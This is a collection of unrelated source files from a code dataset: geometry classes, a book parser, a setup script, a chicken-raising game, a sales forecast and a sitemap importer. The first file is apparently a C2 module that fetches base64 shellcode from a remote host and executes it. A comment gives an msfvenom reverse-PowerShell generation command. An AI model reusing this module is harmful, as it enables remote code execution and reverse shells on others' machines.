{"seq_id":"482523870","text":"import requests\nimport ctypes\nimport base64\nimport subprocess\n\n\ndef run(**args):\n    if 'test' in args and args['test']==True:\n        return 'Shell code could be running'\n    if 'url' in args:\n        url = args['url']\n\n        # Retrieve the shell code and decode it ('only accept \"bin\" files')\n        if url[-3:] == 'bin':\n            response = requests.get(url)\n            shellcode = base64.b64decode(response.text)\n            print(shellcode, end='')\n            subprocess.call('' + shellcode.decode())\n\n\nif __name__ == '__main__':\n    run(test=False, url='http://10.1.22.123:8000/shell.bin')\n\n\n'''\nShell generated using:\n\nmsfvenom -p cmd/windows/reverse_powershell LHOST=\"###.###.###.###\" LPORT=\"####\" -b '\\x00\\xff' --encoder cmd/powershell_base64 -i 2 -f raw -o w64_r_t.raw\nbase64 -i w64_r_t.raw > shell.bin\n'''","sub_path":"07-08-GitCnC/modules/shell_exec2.py","file_name":"shell_exec2.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"581259497","text":"\"\"\"\r\nA class for points polylines and polygons\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nclass Point():\r\n    \"\"\"A class for points in Cartesian coordinate systems.\"\"\"\r\n    def __init__(self, x=None, y=None, key=None):\r\n        self.x, self.y = x, y\r\n        self.key = key\r\n    def __getitem__(self, i):\r\n        if i==0: return self.x\r\n        if i==1: return self.y\r\n        return None\r\n    def __len__(self):\r\n        return 2\r\n    def __eq__(self, other):\r\n        if isinstance(other, Point):\r\n            return self.x==other.x and self.y==other.y\r\n        return NotImplemented\r\n    def __ne__(self, other):\r\n        result = self.__eq__(other)\r\n        if result is NotImplemented:\r\n            return result\r\n        return not result\r\n    def __lt__(self, other):\r\n        if isinstance(other, Point):\r\n            if self.x<other.x:\r\n                return True\r\n            elif self.x==other.x and self.y<other.y:\r\n                return True\r\n            return False\r\n        return NotImplemented\r\n    def __gt__(self, other):\r\n        if isinstance(other, Point):\r\n            if self.x>other.x:\r\n                return True\r\n            elif self.x==other.x and self.y>other.y:\r\n                return True\r\n            return False\r\n        return NotImplemented\r\n    def __ge__(self, other):\r\n        if isinstance(other, Point):\r\n            if self > 
other or self == other:\r\n return True\r\n else:\r\n return False\r\n return False\r\n return NotImplemented\r\n def __le__(self, other):\r\n if isinstance(other, Point):\r\n if self < other or self == other:\r\n return True\r\n else:\r\n return False\r\n return False\r\n return NotImplemented\r\n def __str__(self):\r\n \"\"\"NAP: Not a point\"\"\"\r\n if self.x is None or self.y is None or not isinstance(self.x, (int, float)) or not isinstance(self.y, (int, float)):\r\n return 'NAP'\r\n if isinstance(self.x, (int)):\r\n fmtstr = '({0}, '\r\n else:\r\n fmtstr = '({0:.1f}, '\r\n if isinstance(self.y, (int)):\r\n fmtstr += '{1})'\r\n else:\r\n fmtstr += '{1:.1f})'\r\n return fmtstr.format(self.x, self.y)\r\n def __repr__(self):\r\n return self.__str__()\r\n def distance(self, other):\r\n return sqrt((self.x-other.x)**2 + (self.y-other.y)**2)\r\n def draw(self,color):\r\n plt.plot(self.x,self.y,color=color,marker='.')\r\n def above(self,other):\r\n return self.y>other.y\r\n\r\n\r\n\r\n## Two statuses of the left endpoint\r\nENDPOINT = 0 ## original left endpoint\r\nINTERIOR = 1 ## interior in the segment\r\n\r\nclass Segment:\r\n \"\"\"\r\n A class for line segments.\r\n \"\"\"\r\n def __init__(self, e, p0, p1, c=None):\r\n \"\"\"\r\n Constructor of Segment class.\r\n Input\r\n e: segment ID, an integer\r\n p0, p1: endpoints of segment, Point objects\r\n \"\"\"\r\n if p0>=p1:\r\n p0,p1 = p1,p0 # p0 is always left\r\n self.edge = e # ID, in all edges\r\n self.lp = p0 # left point\r\n self.lp0 = p0 # original left point #*@\\label{lineseg:lp0}\r\n self.rp = p1 # right point\r\n self.status = ENDPOINT # status of segment\r\n self.c = c # c: feature ID\r\n def __eq__(self, other):\r\n if isinstance(other, Segment):\r\n return (self.lp==other.lp and self.rp==other.rp)\\\r\n or (self.lp==other.rp and self.rp==other.lp)\r\n return NotImplemented\r\n def __ne__(self, other):\r\n result = self.__eq__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n def __lt__(self, other): \r\n if isinstance(other, Segment):\r\n if self.lp and other.lp:\r\n lr = sideplr(self.lp, other.lp, other.rp)\r\n if lr == 0:\r\n lrr = sideplr(self.rp, other.lp, other.rp)\r\n if other.lp.x < other.rp.x:\r\n return lrr > 0\r\n else:\r\n return lrr < 0\r\n else:\r\n if other.lp.x > other.rp.x:\r\n return lr < 0\r\n else:\r\n return lr > 0\r\n return NotImplemented\r\n def __gt__(self, other):\r\n result = self.__lt__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n def __repr__(self):\r\n return \"{0}\".format(self.edge)\r\n def contains(self, p):\r\n \"\"\"\r\n Returns none zero if segment has p as an endpoint\r\n \"\"\"\r\n if self.lp == p:\r\n return -1\r\n elif self.rp == p:\r\n return 1\r\n else:\r\n return 0\r\n def lowerpoint(self):\r\n if self.lp.yself.rp.y:\r\n return self.lp\r\n else:\r\n return self.rp\r\n \r\n\r\nclass Vertex(Point):\r\n def __init__(self,x,y,key=None,ear=None,downward_cusp=False,upward_cusp=False,first_edge=None,second_edge=None,inters_edge_l=None,inters_edge_r=None,side=None):\r\n Point.__init__(self,x,y,key)\r\n self.ear=ear\r\n self.downward_cusp=downward_cusp\r\n self.upward_cusp=upward_cusp\r\n self.first_edge=first_edge\r\n self.second_edge=second_edge\r\n self.inters_edge_l=inters_edge_l\r\n self.inters_edge_r=inters_edge_r\r\n self.side=side\r\n \r\nclass Shape():\r\n def __init__(self,points,id=None,t=None):\r\n self.points=points\r\n self.id=id\r\n self.type=t\r\n def __len__(self):\r\n return len(self.points)\r\n def 
__repr__(self):\r\n return str(self.points)\r\n def __iter__(self):\r\n return iter(self.points)\r\n def __delitem__(self,i):\r\n index=i%len(self)\r\n del self.points[index]\r\n def __getitem__(self,i):\r\n index=i%len(self)\r\n return self.points[index]\r\n def append(self,point):\r\n return self.points.append(point)\r\n def pop(self):\r\n self.points.pop()\r\n def index(self,point):\r\n return self.points.index(point)\r\n \r\n \r\nclass Polyline(Shape):\r\n def __init__(self,points,color='grey',id=None,name=None):\r\n Shape.__init__(self,points,id,\"polyline\")\r\n self.name=name\r\n self.color=color\r\n def draw(self):\r\n line_xcoord=[point.x for point in self.points]\r\n line_ycoord=[point.y for point in self.points]\r\n plt.plot(line_xcoord,line_ycoord,color=self.color)\r\n\r\n\r\nclass Polygon(Shape):\r\n def __init__(self,points,edgecolor='grey',fillcolor='white',id=None,name=None):\r\n Shape.__init__(self,points,id,\"polygon\")\r\n self.name=name\r\n self.fillcolor=fillcolor\r\n self.edgecolor=edgecolor\r\n \r\n def area(self):\r\n numvert=len(self)\r\n A=0\r\n for i in range(numvert):\r\n ai=self[i].x*self[i+1].y-self[i+1].x*self[i].y\r\n A=A+ai\r\n A=A/2.0\r\n return A\r\n\r\n def centroid(self):\r\n numvert=len(self)\r\n A=0\r\n xmean=0\r\n ymean=0\r\n for i in range(numvert):\r\n ai=self[i].x*self[i+1].y-self[i+1].x*self[i].y\r\n A=A+ai\r\n xmean=xmean+(self[i].x+self[i+1].x)*ai\r\n ymean=ymean+(self[i].y+self[i+1].y)*ai \r\n C=Point(xmean/(3*A),ymean/(3*A))\r\n return C\r\n \r\n def edge_list(self):\r\n edge_list=[]\r\n n=len(self.points)\r\n for i in range(n-1):\r\n edge=Segment(i,self.points[i],self.points[i+1])\r\n edge_list=edge_list+[edge]\r\n edge=Segment(n-1,self.points[n-1],self.points[0])\r\n edge_list=edge_list+[edge]\r\n return edge_list\r\n \r\n def incident_edges(self,vertex):\r\n return [edge for edge in self.edge_list() if vertex==edge.rp or vertex==edge.lp]\r\n \r\n def draw(self):\r\n poly_xcoord=[point.x for point in self.points]\r\n poly_ycoord=[point.y for point in self.points]\r\n plt.fill(poly_xcoord,poly_ycoord,closed=True,fill=True,\r\n facecolor=self.fillcolor,\r\n edgecolor=self.edgecolor,alpha=0.5)\r\n \r\n","sub_path":"shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364873420","text":"import os\nimport sys\nimport glob\n\n\nVALID_TAGS = tuple('natural caption blank_line attribute source_header block_header code anchor image_link'.split() +\n 'block_start block_end code_start code_end natural_start natural_end'.split() +\n ['heading{}'.format(i) for i in range(1, 7)])\nINCLUDE_TAGS = ('natural', 'caption', 'heading1', 'heading2', 'heading3', 'heading4', 'heading5')\n\n\ndef get_lines(file_path):\n r\"\"\" Retrieve text lines from the manuscript Chapter*.asc and Appendix*.asc files\n\n Args:\n file_path (str): Path to directory containing manuscript asciidoc files\n i.e.: /Users/cole-home/repos/nlpinaction/manuscript/\n\n Returns:\n list of lists of str, one list for each Chapter or Appendix\n \"\"\"\n path = os.path.join(file_path, 'Chapter*')\n files = glob.glob(path)\n lines = []\n for file in files:\n with open(file, 'r') as f:\n lines.append(f.readlines())\n\n path = os.path.join(file_path, 'Appendix*')\n files = glob.glob(path)\n for file in files:\n with open(file, 'r') as f:\n lines.append(f.readlines())\n return lines\n\n\ndef tag_lines(lines):\n r\"\"\" Naively tags lines from manuscript with: code, natural, 
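Two short notes on shapes.py above. First, Segment.__lt__ calls sideplr(p, lp, rp), which the file neither defines nor imports; it presumably comes from a companion geometry module. A conventional cross-product sketch of such a side-of-line predicate (the name and sign convention are assumptions inferred from how __lt__ uses it):

def sideplr(p, p1, p2):
    # Side of point p relative to the directed line p1 -> p2: the 2-D cross
    # product is positive on one side, negative on the other, and zero when
    # the three points are collinear (hypothetical helper).
    return (p.x - p1.x) * (p2.y - p1.y) - (p2.x - p1.x) * (p.y - p1.y)

Second, a quick sanity check of the shoelace area() and centroid() methods, assuming the module is importable as shapes; the wrap-around indexing in Shape.__getitem__ means the first vertex need not be repeated, and the sign of area() follows the vertex winding:

from shapes import Point, Polygon  # assumed module name

square = Polygon([Point(0, 0), Point(2, 0), Point(2, 2), Point(0, 2)])
print(square.area())      # 4.0 for this counter-clockwise ring, negative if clockwise
print(square.centroid())  # (1.0, 1.0)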
heading, etc.\n\n Returns:\n list of tuples [(tag, line), ...]\n\n >>> VALID_TAGS\n ('natural',\n 'caption',\n 'blank_line',\n 'attribute',\n 'source_header',\n 'block_header',\n 'code',\n 'anchor',\n 'image_link',\n 'block_start',\n 'block_end',\n 'code_start',\n 'code_end',\n 'natural_start',\n 'natural_end',\n 'heading1',\n 'heading2',\n 'heading3',\n 'heading4',\n 'heading5',\n 'heading6')\n\n >>> tag_lines('|= Title| :chapter: 0|Hello|cruel world|==Heading Level 2| \\t| [source,bash]|====|$ grep this|====|'.split('|'))\n [('blank_line', ''),\n ('heading1', '= Title'),\n ('attribute', ':chapter: 0'),\n ('natural', 'Hello'),\n ('natural', 'cruel world'),\n ('heading2', '==Heading Level 2'),\n ('blank_line', ''),\n ('source_header', '[source,bash]'),\n ('block_start', '===='),\n ('code', '$ grep this'),\n ('block_end', '===='),\n ('blank_line', '')]\n \"\"\"\n current_block_type = None\n open_block = False\n block_terminator = None\n block_start = 0\n tup_lines = []\n for idx, line in enumerate(lines):\n normalized_line = line.lower().strip().replace(\" \", \"\")\n\n if not normalized_line:\n tag = 'blank_line'\n elif normalized_line[0] in r'/:':\n tag = 'attribute'\n elif normalized_line.startswith('[source'):\n current_block_type = 'code'\n block_start = idx\n open_block = True\n tag = 'source_header'\n elif normalized_line[:4] in ('[tip', '[not', '[imp', '[quo'):\n current_block_type = 'natural'\n block_start = idx\n open_block = True\n tag = 'block_header'\n elif open_block and idx == block_start + 1:\n if not normalized_line.startswith('--') and not normalized_line.startswith('=='):\n block_terminator = '\\n'\n tag = current_block_type\n else:\n block_terminator = normalized_line[:2]\n tag = (current_block_type or 'block') + '_start'\n elif open_block and normalized_line[:2] == block_terminator:\n current_block_type = None\n open_block = False\n block_terminator = None\n block_start = 0\n tag = (current_block_type or 'block') + '_end'\n elif open_block and current_block_type == 'code':\n tag = 'code'\n elif normalized_line.startswith('='):\n tag = 'heading'\n tag += str(len([c for c in normalized_line if c == '=']))\n elif normalized_line.startswith('.'):\n tag = 'caption'\n elif normalized_line.startswith('image:'):\n tag = 'image_link'\n elif normalized_line.startswith('[['):\n tag = 'anchor'\n else:\n tag = 'natural'\n current_block_type = None\n\n tup_lines.append((tag, line.strip()))\n\n return tup_lines\n\n\ndef main(book_dir='.',\n include_tags=INCLUDE_TAGS,\n verbose=True):\n sections = [tag_lines(section) for section in get_lines(book_dir)]\n if verbose:\n for section in sections:\n for line in section:\n if line[0] in include_tags:\n print(line[1])\n return sections\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n book_dir = os.path.curdir\n if args:\n book_dir = args[0]\n include_tags = ['natural']\n if len(args) > 1:\n include_tags = list(args[1:])\n # print('Parsing Chapters and Appendices in: ' + book_dir)\n # print('***PRINTING LINES WITH TAGS***: ' + str(include_tags))\n main(book_dir=book_dir, include_tags=include_tags, verbose=True)\n","sub_path":"src/nlpia/book_parser.py","file_name":"book_parser.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"638761501","text":"# -*- coding: utf-8 -*-\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nVERSION = '0.3.8'\n\nsetup(\n name='kamonohashi-cli',\n version=VERSION,\n description='KAMONOHASHI 
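A small sketch of driving the tagger above from Python rather than the command line, mirroring what main() does with INCLUDE_TAGS; the book_parser import path is an assumption taken from the record's sub_path:

from book_parser import tag_lines  # assumed import path

lines = '= Title|Hello world|[source,python]|----|print(1)|----'.split('|')
for tag, line in tag_lines(lines):
    if tag in ('heading1', 'natural'):
        print(tag, line)  # heading1 '= Title', then natural 'Hello world'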
Command Line Interface',\n long_description='Python command line interface for KAMONOHASHI https://kamonohashi.ai/',\n author='NS Solutions Corporation',\n author_email='kamonohashi-support@jp.nssol.nssmc.com',\n url='https://github.com/KAMONOHASHI/kamonohashi-cli',\n license='Apache License 2.0',\n packages=find_packages(),\n install_requires=[\n 'click',\n 'six >= 1.10',\n 'kamonohashi-sdk == 0.3.6',\n ],\n entry_points={\n 'console_scripts': ['kqi = cli.kqi:kqi_main']\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458053097","text":"import random\n\nclass Chicken(): #雞\n def __init__(self,Name,State,State_,Level,EXP,EXP_,HP,HP_,ATK,ATK_,DF,DF_,\n MP,MP_,Hunger,Emotion,Luck,Map,Point,Resistance,Day,Time):#Time一秒為2分鐘\n self.State = State\n self.State_ = State_\n self.Name = Name\n self.EXP = EXP\n self.EXP_ = EXP_\n self.Level = Level\n self.HP = HP\n self.HP_ = HP_ \n self.ATK = ATK\n self.ATK_ = ATK_\n self.DF = DF\n self.DF_ = DF_\n self.Hunger = Hunger\n self.Emotion = Emotion\n self.MP = MP\n self.MP_ = MP_\n self.Luck = Luck\n self.Map = Map\n self.Point = Point\n self.Resistance = Resistance\n self.Day = Day\n self.Time = Time\n def _State(self,i=0):\n if i==0:\n if self.Hunger <= 100: #怕程式碼太亂打的\n if 10 < self.Hunger <= 33:\n print('狀態: 有點餓了')\n if 0 < self.Hunger <= 10:\n self.State_[0] = 1\n print('狀態: 現在非常餓')\n if self.Hunger <= 0:\n print('狀態: 鬧飢荒咯! 生命值大幅降低')\n if self.State_[0] != 2:\n self.HP_ = int(self.HP_/2)\n self.State_[0] = 2\n if self.State_[0] == 1: #debug用\n if self.Hunger >= 33:\n self.State_[0] = 0\n if self.State_[0] == 2:\n if self.Hunger >= 33:\n print('狀態: 飢荒問題解決了...暫時...(生命上限回升)')\n oo = input(\"\")\n self.State_[0] = 0\n elif i==1:\n #體力值\n if self.MP_ <= self.MP:\n if self.MP/10 < self.MP_ <= self.MP/3:\n print('狀態: 有點累了')\n if 0 < self.MP_ <= self.MP/10:\n self.State_[1] = 1\n print('狀態: 真D累了')\n if self.MP_ <= 0:\n print('狀態: 你的雞累到沒力了 攻擊力大幅降低')\n if self.State_[1] != 2:\n self.ATK_ = int(self.ATK_/2)\n self.State_[1] = 2\n if self.State_[1] == 1: #debug用\n if self.MP_ >= self.MP/3:\n self.State_[1] = 0\n if self.State_[1] == 2:\n if self.MP_ >= self.MP/3:\n print('狀態: 休息夠了 你的雞願意繼續奮鬥了(攻擊力回升)')\n self.ATK_ = self.ATK\n self.State_[1] = 0\n elif i==2:\n #心情值\n if self.Emotion <= 100:\n if 10 < self.Emotion <= 33:\n print('狀態: 心情不太好')\n if 0 < self.Emotion <= 10:\n self.State_[2] = 1\n print('狀態: 心情頗遭(聽說是計概要被當了)')\n if self.Emotion <= 0:\n print('狀態: 人格分裂 出現疑似抖M傾向 防禦力大幅降低')\n if self.State_[2] != 2:\n self.DF_ = int(self.DF_/2)\n self.State_[2] = 2\n if self.State_[2] == 1: #debug用\n if self.Emotion >= 33:\n self.State_[2] = 0\n if self.State_[2] == 2:\n if self.Emotion >= 33:\n print('狀態: 人格分裂還沒有很嚴重 硬是救回來了(防禦力回升)')\n oo = input(\"\")\n self.DF_ = self.DF\n self.State_[2] = 0\n elif i==3:\n #生命值\n if self.HP_ <= self.HP:\n if self.HP/10 < self.HP_ <= self.HP/3 and self.State_[3] != 1:\n self.State_[3] = 1\n print(self.Name,'狀態: 的狀況不太優 請盡快進行治療')\n if 0 < self.HP_ <= self.HP/10 and self.State_[3] != 2:\n self.State_[3] = 2\n print('狀態: 當前血量十分危急 請盡速治療')\n if self.HP_ <= 0:\n self.HP_ = 0\n print(self.Name,' 與你的冒險就此終結 關於你傳奇的一生 沒人想知道','\\n'\n ,' R.I.P 願你的計概分數不會如此\\n')\n print(\"提示: 重新開啟後會讀入當天早上的存檔\")\n while 1:\n c = 8763\n if self.State_[3] == 1: #debug用\n if self.HP_ >= self.HP/3:\n self.State_[2] = 0\n if self.State_[3] == 2:\n if self.HP_ >= self.HP/3:\n print('狀態: 血量提升 感覺好多了')\n oo = input(\"\")\n 
self.State_[3] = 0\n elif i==4:\n #狀態語音\n print(\"\")\n if self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] == 0:\n self.State = '優良'\n elif 3 <= self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] <= 4:\n self.State = '不太優'\n print('你家的雞狀況不太優 自己注意嘿',end=\"\")\n oo = input(\"\")\n elif 3 < self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] <= 5:\n self.State = '很不優'\n print('你家的雞狀況真的很不優 有沒有在照顧阿?',end=\"\")\n oo = input(\"\")\n elif self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] == 6:\n self.State = '糟糕'\n print('你不怕可愛動物保護協會來找你?',end=\"\")\n oo = input(\"\")\n elif self.State_[0]+self.State_[1]+self.State_[2]+self.State_[3] >= 7:\n self.State = '難以理解'\n print('請停止虐雞 你的行為害我們得多打這串程式碼來提醒你 請別增加工作負擔 謝謝!',end=\"\")\n oo = input(\"\")\n if i==5:\n print(\"\")\n print(self.Name,' ','Level ',self.Level,'(',self.EXP_,'/',self.EXP,')'\n ,'\\n','HP: ','(',self.HP_,'/',self.HP,')',' ','ATK: ',self.ATK_,' ','DF: ',self.DF_,' '\n ,'\\n','飽食度: ','(',self.Hunger,'/100',')',' ','心情值: ','(',self.Emotion,'/100',')'\n ,' ','體力值: ','(',self.MP_,'/',self.MP,')','\\n','當前狀態: '\n ,self.State,' ','幸運值: ',self.Luck,' ','點數:',self.Point)\n print(\"\") \n def _Name(self,Name):\n self.Name = Name\n def _EXP(self,EXP):\n self.EXP_ += EXP\n if self.EXP_ >= self.EXP and self.Level < 50:\n self.EXP_ -= self.EXP\n self.EXP = int(self.EXP*1.09)\n if self.Level <= 10:\n self.Level += 1\n self.Point += 2\n self.MP += 2\n self.MP_ += 2\n elif 10 < self.Level <= 20:\n self.Level += 1\n self.Point += 2\n self.MP += 2\n self.MP_ += 2\n elif 20 < self.Level <= 30:\n self.Level += 1\n self.Point += 3\n self.MP += 2\n self.MP_ += 2\n elif 30 < self.Level <= 40:\n self.Level += 1\n self.Point += 3\n self.MP += 2\n self.MP_ += 2\n elif 40 < self.Level < 50:\n self.Level += 1\n self.Point += 4\n print(self.Name,\"升級了\",end = \"\")\n oo = input(\"\")\n if self.Level == 10:\n self.ATK += 5\n self.ATK_ += 5\n self.HP += 50\n self.HP_ += 50\n self.DF += 5\n self.DF_ += 5\n self.Luck += 2\n elif self.Level == 20:\n self.ATK += 7\n self.ATK_ += 7\n self.HP += 75\n self.HP_ += 75\n self.DF += 7\n self.DF_ += 7\n self.Luck += 2\n elif self.Level == 30:\n self.ATK += 9\n self.ATK_ += 9\n self.HP += 100\n self.HP_ += 100\n self.DF += 9\n self.DF_ += 9\n self.Luck += 2\n elif self.Level == 40:\n self.ATK += 12\n self.ATK_ += 12\n self.HP += 150\n self.HP_ += 150\n self.DF += 12\n self.DF_ += 12\n self.Luck += 2\n elif self.Level == 50:\n self.ATK += 15\n self.ATK_ += 15\n self.HP += 200\n self.HP_ += 200\n self.DF += 15\n self.DF_ += 15\n self.Luck += 2\n\n print(\"\")\n def _HP(self,HP):\n self.HP_ += HP\n if self.HP_ > self.HP and self.State_[0] == 0:\n self.HP_ = self.HP\n if self.HP_ > self.HP/2 and self.State_[0] == 2:\n self.HP_ = int(self.HP/2)\n def _ATK(self,ATK):\n self.ATK_ += ATK\n if self.ATK_ > self.ATK and self.State_[1] == 0:\n self.ATK_ = self.ATK\n if self.ATK_ > self.ATK/2 and self.State_[1] == 2:\n self.ATK_ = int(self.ATK/2)\n def _DF(self,DF):\n self.DF_ += DF\n if self.DF_ > self.DF and self.State_[2] == 0:\n self.DF_ = self.DF\n if self.DF_ > self.DF/2 and self.State_[2] == 2:\n self.DF_ = int(self.DF/2)\n def _Hunger(self,Hunger):\n self.Hunger += Hunger\n if self.Hunger > 100:\n self.Hunger = 100\n if self.Hunger < 0:\n self.Hunger = 0\n def _MP(self,MP):\n self.MP_ += MP\n if self.MP_ > self.MP:\n self.MP_ = self.MP\n if self.MP_ <= 0:\n self.MP_ = 0\n def _Emotion(self,Emotion):\n self.Emotion += Emotion\n if self.Emotion > 100:\n self.Emotion = 100\n if self.Emotion < 0:\n 
self.Emotion = 0\n def Add_Time(self,Time):\n self.Time += Time\n if self.Time >= 720:\n self.Day += 1\n self.Time -= 720\n if self.Time-Time < 690 <= self.Time and self.Day>=2:\n print(\"時間太晚了\",self.Name,\"心情值降低\")\n self._Emotion(-15)\n print(\"心情值減少15\",end=\"\")\n oo = input(\"\")\n if self.Time-Time < 630 <= self.Time:\n print(\"時間有點晚搂 要回去睡覺了\")\n oo = input(\"\")\n if (self.Time-Time < 660 <= self.Time or\n self.Time-Time < 600 <= self.Time or\n self.Time-Time < 530 <= self.Time or\n self.Time-Time < 470 <= self.Time or\n self.Time-Time < 410 <= self.Time or\n self.Time-Time < 350 <= self.Time or\n self.Time-Time < 290 <= self.Time or\n self.Time-Time < 230 <= self.Time) and self.Day>=2:\n p = self.Hunger - 2\n if p < 0:\n self.Hunger = 0\n else:\n self.Hunger = p\n def Now_Time(self):\n print(\"現在的時間是: \")\n print(\"第\",self.Day,\"天 \",int(self.Time/30),\"點\",self.Time%30,\"分\",sep = \"\")\n","sub_path":"Asset/Chicken_System.py","file_name":"Chicken_System.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346093843","text":"import numpy as np\nimport pandas as pd\nfrom model.ets.ets import holtWinters\nfrom pyecharts import Line\n\ndf=pd.read_csv(\"../data/sales.csv\",header=None)\nmonths=23\ndf.columns=['timestamp','sales']\ncolumns_pre=df.timestamp.values[-months:]\ndf_pre=pd.DataFrame(np.zeros((months,months)))\ndf_pre.columns=columns_pre\ndf_pre[\"add1\"]=0\ndf_pre['add2']=0\ndf_pre[\"add3\"]=0\n\nfor i in range(df.shape[0]-months,df.shape[0]):\n tsA=df.iloc[0:i,1]\n \n result_ets=holtWinters(tsA, 12, 2, 4, mtype = 'additive')\n #result_ets=holtWinters(tsA, 12, 4, 4, mtype = 'other')\n result_ets2=np.round(list(result_ets['predicted']),2)\n print(i,tsA,result_ets2)\n \n begin_num=(i+months-df.shape[0])\n try:\n df_pre.iloc[begin_num,begin_num:begin_num+4]=result_ets2\n #df_pre.iloc[begin_num,begin_num:begin_num+4]=[1,1,1,1]\n except Exception as e:\n print('报错')\n \n \ndf_plot=df_pre.iloc[:,3:-3]\nlist_pre1=[]\nlist_pre2=[]\nlist_pre3=[]\nlist_pre4=[]\nfor j in range(0,df_plot.shape[1]):\n list_pre1.append(df_plot.iloc[j,j])\n list_pre2.append(df_plot.iloc[j+1,j])\n list_pre3.append(df_plot.iloc[j+2,j])\n list_pre4.append(df_plot.iloc[j+3,j])\n\n \ndate_all=df.timestamp[df.shape[0]-months+3:]\nsales_real= df.sales[df.shape[0]-months+3:]\n\ndate_pre=df_plot.columns\nsales1=list_pre1\nsales2=list_pre2\nsales3=list_pre3\nsales4=list_pre4\n\nline = Line(\"空调销售预测\")\nline.add(\"实际销量结果\", date_all, sales_real,line_color='black',line_width=2)\n\n#line.add(\"第一次预测结果\", date_pre, sales1,line_type='dashed',line_color='green')\n#line.add(\"第二次预测结果\", date_pre, sales2,line_type='dashed',line_color='green')\n#line.add(\"第三次预测结果\", date_pre, sales3,line_type='dashed',line_color='green')\nline.add(\"第四次预测结果\", date_pre, sales4,line_type='dashed',line_color='green')\n#line.add(\"python版arima预测结果\",date_pre,sales_arima_python,line_type='dashed',line_color='red',line_width=2)\n#line.add(\"商家B\", attr, v2, is_smooth=True,mark_line=[\"max\", \"average\"])\nline.render('../data/python_ets.html')\n'''\nresults1 = holtWinters(tsA, 12, 4, 4, mtype = 'additive')\nresults2 = holtWinters(tsA, 12, 4, 4, mtype = 'multiplicative')\n\nprint(\"TUNING: \", results1['alpha'], results1['beta'], results1['gamma'], results1['MSD'])\nprint(\"FINAL PARAMETERS: \", results1['params'])\nprint(\"PREDICTED VALUES: \", 
results1['predicted'])\n'''\n","sub_path":"scripts/run_python_ets.py","file_name":"run_python_ets.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367529769","text":"# -*- coding: utf-8 -*-\n\nimport urllib2\nfrom xml.dom import minidom\n\nfrom task import Task\nfrom sqlexecutor import SqlExecutor\n\n\nclass ImportGomeData(Task):\n\n def __init__(self, cfg):\n super(ImportGomeData, self).__init__(cfg)\n\n #self.__sqle = SqlExecutor(cfg['db_args'])\n\n def suck(self):\n if self._cfg['datasource']['index']:\n idx = self.__get_index(self._cfg['datasource']['index'])\n for loc in idx:\n self._logger.debug(loc)\n products = self.__get_products(loc)\n #data = []\n\n #try:\n # data = self.__capture()\n #except Exception as e:\n # self._send_error_msg('Capturing qingpai.t_light failed.\\n%s' % e)\n\n #self._logger.info('[%d] data captured.' % len(data))\n #self._logger.debug('%s' % data)\n\n #if not data:\n # return\n\n #for rec in data:\n # self._logger.info('[app_id]: %s [xml_url]: %s [update_frequency]: %s [last_updated_time]: %s' % (rec[0], rec[1], rec[2], rec[3]))\n\n # if self.__should_send(rec[2], rec[3]):\n # ret = self.__send({ 'appid': rec[0], 'xmlurl': rec[1] })\n # self._logger.info(ret)\n # else:\n # self._logger.info('skipped')\n\n def die(self):\n try:\n #self.__sqle.close()\n\n super(ImportGomeData, self).die()\n except Exception as e:\n self._logger.error('ImportGomeData:die(): %s\\n' % e)\n\n def __get_index(self, url):\n retval = []\n\n xml = urllib2.urlopen(url)\n if xml.getcode() == 200:\n dom = minidom.parseString(xml.read().decode('utf-8'))\n sms = dom.documentElement.getElementsByTagName('sitemap')\n for sm in sms:\n loc = sm.getElementsByTagName('loc')[0].childNodes[0].nodeValue\n retval.append(loc)\n\n return retval\n\n def __get_products(self, url):\n retval = []\n\n xml = urllib2.urlopen(url)\n if xml.getcode() == 200:\n dom = minidom.parseString(xml.read().decode('utf-8'))\n products = dom.documentElement.getElementsByTagName('url')\n for p in products:\n pdata = {}\n pdata['ad_url'] = p.getElementsByTagName('jumploc')[0].childNodes[0].nodeValue\n pdata['ad_desc'] = p.getElementsByTagName('title')[0].childNodes[0].nodeValue\n pdata['image_url'] = p.getElementsByTagName('image')[0].childNodes[0].nodeValue\n pdata['image_keywords'] = p.getElementsByTagName('keywords')[0].childNodes[0].nodeValue\n self._logger.debug(pdata)\n retval.append(pdata)\n\n return retval\n","sub_path":"worker/qp_stat_report/tasks/import_gome_data.py","file_name":"import_gome_data.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"420518629","text":"# Ben Jordan\r\n# 12/9/2020\r\n\r\nfrom random import shuffle\r\n# Only used to associate values\r\nvaluesdict = {'Two' : 2, 'Three' : 3, 'Four' : 4, 'Five' : 5, 'Six': 6,\r\n 'Seven': 7, 'Eight' : 8, 'Nine' : 9, 'Ten': 10, 'Jack': 11, \r\n 'Queen': 12, 'King' : 13, 'Ace' : 14}\r\n\r\n# create card instances\r\nsuits = [ \"Hearts\", \"Clubs\", \"Spades\", \"Diamonds\"]\r\nranks = list(valuesdict.keys())\r\n\r\n# create card class\r\nclass Card:\r\n \r\n def __init__(self, suit, rank):\r\n self.suit = suit\r\n self.rank = 